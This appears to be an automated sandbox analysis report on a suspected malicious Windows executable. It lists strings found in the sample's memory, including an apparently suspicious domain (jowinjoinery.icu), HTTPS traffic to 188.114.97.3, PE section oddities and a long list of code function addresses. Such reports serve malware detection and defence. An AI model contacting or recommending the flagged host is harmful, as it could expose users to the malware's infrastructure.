Source: file.exe, 00000000.00000003.1697028773.00000000009FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu:443/bdWUa
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000003.1607183796.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: file.exe, 00000000.00000003.1545155969.0000000005738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.1606857160.0000000005A46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B000B0	0_2_00B000B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1C320	0_2_00B1C320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEA430	0_2_00AEA430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF8900	0_2_00AF8900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AFCBB0	0_2_00AFCBB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF0B40	0_2_00AF0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1D0C0	0_2_00B1D0C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEB1D8	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B073CB	0_2_00B073CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AE55F6	0_2_00AE55F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B176C0	0_2_00B176C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADD780	0_2_00ADD780
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B19775	0_2_00B19775
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B138C0	0_2_00B138C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AE1822	0_2_00AE1822
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADDA3A	0_2_00ADDA3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B13C30	0_2_00B13C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEE0AC	0_2_00AEE0AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8E0BD	0_2_00B8E0BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C520C0	0_2_00C520C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1A0CB	0_2_00C1A0CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B760B8	0_2_00B760B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1C0A0	0_2_00B1C0A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B860A6	0_2_00B860A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA00A5	0_2_00BA00A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C100E3	0_2_00C100E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBA098	0_2_00BBA098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2C0F0	0_2_00C2C0F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B98082	0_2_00B98082
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCE080	0_2_00BCE080
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C240FE	0_2_00C240FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7609E	0_2_00C7609E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4A09F	0_2_00C4A09F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDC0DF	0_2_00BDC0DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B44035	0_2_00B44035
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC203A	0_2_00BC203A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD4035	0_2_00BD4035
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B42038	0_2_00B42038
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5A03B	0_2_00B5A03B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4600B	0_2_00B4600B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6A000	0_2_00C6A000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C02007	0_2_00C02007
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1C009	0_2_00C1C009
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4A054	0_2_00B4A054
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2603A	0_2_00C2603A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5C04C	0_2_00B5C04C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6403A	0_2_00C6403A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B701B4	0_2_00B701B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C081CB	0_2_00C081CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5C1CB	0_2_00C5C1CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6E1D5	0_2_00C6E1D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C181DA	0_2_00C181DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC4190	0_2_00BC4190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF0180	0_2_00AF0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C841FD	0_2_00C841FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C62187	0_2_00C62187
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C14185	0_2_00C14185
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF21F7	0_2_00BF21F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B061D8	0_2_00B061D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEA1CF	0_2_00BEA1CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD01C9	0_2_00BD01C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1C147	0_2_00C1C147
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB0133	0_2_00BB0133
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B02120	0_2_00B02120
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF6126	0_2_00BF6126
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA4126	0_2_00BA4126
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD2118	0_2_00BD2118
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C02173	0_2_00C02173
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2A17E	0_2_00C2A17E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB8105	0_2_00BB8105
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C56105	0_2_00C56105
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B0617E	0_2_00B0617E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBE15A	0_2_00BBE15A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCC158	0_2_00BCC158
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B78158	0_2_00B78158
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C50135	0_2_00C50135
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC814E	0_2_00BC814E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C9E133	0_2_00C9E133
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEC141	0_2_00BEC141
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B502B0	0_2_00B502B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B722B2	0_2_00B722B2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9A2A1	0_2_00B9A2A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEE2A0	0_2_00BEE2A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B54299	0_2_00B54299
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C062F2	0_2_00C062F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA0280	0_2_00BA0280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB62FA	0_2_00BB62FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF02F8	0_2_00BF02F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B062F9	0_2_00B062F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA82ED	0_2_00BA82ED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5E2ED	0_2_00B5E2ED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEE2C6	0_2_00AEE2C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFC2CF	0_2_00BFC2CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C602B8	0_2_00C602B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C80252	0_2_00C80252
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7A25A	0_2_00C7A25A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B68212	0_2_00B68212
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C58274	0_2_00C58274
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB420F	0_2_00BB420F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD6206	0_2_00BD6206
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C36200	0_2_00C36200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B96265	0_2_00B96265
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E26A	0_2_00B4E26A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3E229	0_2_00C3E229
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B18240	0_2_00B18240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C04231	0_2_00C04231
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B90240	0_2_00B90240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C263C0	0_2_00C263C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C203D4	0_2_00C203D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B44393	0_2_00B44393
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5E3F0	0_2_00C5E3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADA390	0_2_00ADA390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE03F4	0_2_00BE03F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9C3E8	0_2_00B9C3E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B663EF	0_2_00B663EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4439D	0_2_00C4439D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C143A0	0_2_00C143A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7C3A6	0_2_00C7C3A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C663BB	0_2_00C663BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C48345	0_2_00C48345
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCC33B	0_2_00BCC33B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8A335	0_2_00B8A335
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4034B	0_2_00C4034B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAA32C	0_2_00BAA32C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE6326	0_2_00BE6326
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B88313	0_2_00B88313
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFA30D	0_2_00BFA30D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CA837D	0_2_00CA837D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3C379	0_2_00C3C379
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AE6312	0_2_00AE6312
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C16306	0_2_00C16306
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C38309	0_2_00C38309
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3E367	0_2_00B3E367
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0E31F	0_2_00C0E31F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B52354	0_2_00B52354
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA2358	0_2_00BA2358
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7035F	0_2_00B7035F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B62345	0_2_00B62345
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFE346	0_2_00BFE346
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C364C6	0_2_00C364C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD84B7	0_2_00BD84B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C464C9	0_2_00C464C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4C4D9	0_2_00C4C4D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C304E3	0_2_00C304E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C524E8	0_2_00C524E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C624F4	0_2_00C624F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C804FF	0_2_00C804FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B784F5	0_2_00B784F5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4A4BC	0_2_00C4A4BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC04C7	0_2_00BC04C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C8244B	0_2_00C8244B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2E44A	0_2_00C2E44A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B52439	0_2_00B52439
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEA424	0_2_00BEA424
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3A458	0_2_00C3A458
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7A41C	0_2_00B7A41C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B94414	0_2_00B94414
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C64468	0_2_00C64468
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5641A	0_2_00B5641A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7447E	0_2_00B7447E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADC470	0_2_00ADC470
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFC441	0_2_00BFC441
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6A5B6	0_2_00B6A5B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDA5BD	0_2_00BDA5BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B0E5A0	0_2_00B0E5A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA45A6	0_2_00BA45A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE85A3	0_2_00BE85A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF45B0	0_2_00AF45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF259D	0_2_00BF259D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C385E6	0_2_00C385E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF0589	0_2_00AF0589
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBE59D	0_2_00BBE59D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC859A	0_2_00BC859A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2E5E9	0_2_00C2E5E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6C59A	0_2_00B6C59A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C825E7	0_2_00C825E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDC582	0_2_00BDC582
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5A596	0_2_00C5A596
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3E599	0_2_00C3E599
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE45DA	0_2_00BE45DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B825D5	0_2_00B825D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B0C530	0_2_00B0C530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9653D	0_2_00B9653D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB2537	0_2_00BB2537
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5054B	0_2_00C5054B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B76520	0_2_00B76520
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9850F	0_2_00B9850F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCE507	0_2_00BCE507
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1A50A	0_2_00C1A50A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAC577	0_2_00BAC577
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C76515	0_2_00C76515
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD256B	0_2_00BD256B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4C554	0_2_00B4C554
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2A520	0_2_00C2A520
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B02540	0_2_00B02540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1C534	0_2_00C1C534
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6E540	0_2_00B6E540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3A6C2	0_2_00C3A6C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B646B8	0_2_00B646B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA06AA	0_2_00BA06AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B906A2	0_2_00B906A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF4691	0_2_00BF4691
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEE6FA	0_2_00BEE6FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF06F1	0_2_00BF06F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B486E4	0_2_00B486E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C42694	0_2_00C42694
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B786E2	0_2_00B786E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C546A2	0_2_00C546A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEC6D6	0_2_00BEC6D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7A6BF	0_2_00C7A6BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1464B	0_2_00C1464B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAA628	0_2_00BAA628
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBC628	0_2_00BBC628
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEA62B	0_2_00BEA62B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B96622	0_2_00B96622
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2265D	0_2_00C2265D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0A661	0_2_00C0A661
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C78676	0_2_00C78676
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B00670	0_2_00B00670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0E606	0_2_00C0E606
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7C67F	0_2_00B7C67F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADE660	0_2_00ADE660
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1266C	0_2_00B1266C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5E66B	0_2_00B5E66B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B00650	0_2_00B00650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B567B5	0_2_00B567B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7C7D6	0_2_00C7C7D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0E7D5	0_2_00C0E7D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C607D3	0_2_00C607D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0C7DA	0_2_00C0C7DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5C79D	0_2_00B5C79D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCA788	0_2_00BCA788
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB8780	0_2_00BB8780
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD2790	0_2_00AD2790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9E786	0_2_00B9E786
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B427F3	0_2_00B427F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE27F7	0_2_00BE27F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B747FB	0_2_00B747FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5C79C	0_2_00C5C79C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B887DA	0_2_00B887DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C647B5	0_2_00C647B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB67C3	0_2_00BB67C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C58746	0_2_00C58746
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C26744	0_2_00C26744
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C9C75A	0_2_00C9C75A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6872C	0_2_00B6872C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2A774	0_2_00C2A774
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E70B	0_2_00B4E70B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C34704	0_2_00C34704
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBA774	0_2_00BBA774
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3271E	0_2_00C3271E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B14750	0_2_00B14750
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C28726	0_2_00C28726
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3E72F	0_2_00C3E72F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6672B	0_2_00C6672B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA274B	0_2_00BA274B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C68735	0_2_00C68735
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6E732	0_2_00C6E732
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5E8C3	0_2_00C5E8C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD08B5	0_2_00BD08B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4C8BA	0_2_00B4C8BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C188DA	0_2_00C188DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9C8A6	0_2_00B9C8A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9A898	0_2_00B9A898
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF689D	0_2_00BF689D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C408E2	0_2_00C408E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB2892	0_2_00BB2892
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD6884	0_2_00BD6884
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1A88E	0_2_00B1A88E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCE8F4	0_2_00BCE8F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1E88A	0_2_00C1E88A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4488A	0_2_00C4488A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3C8A1	0_2_00C3C8A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B448DD	0_2_00B448DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CAA8A1	0_2_00CAA8A1
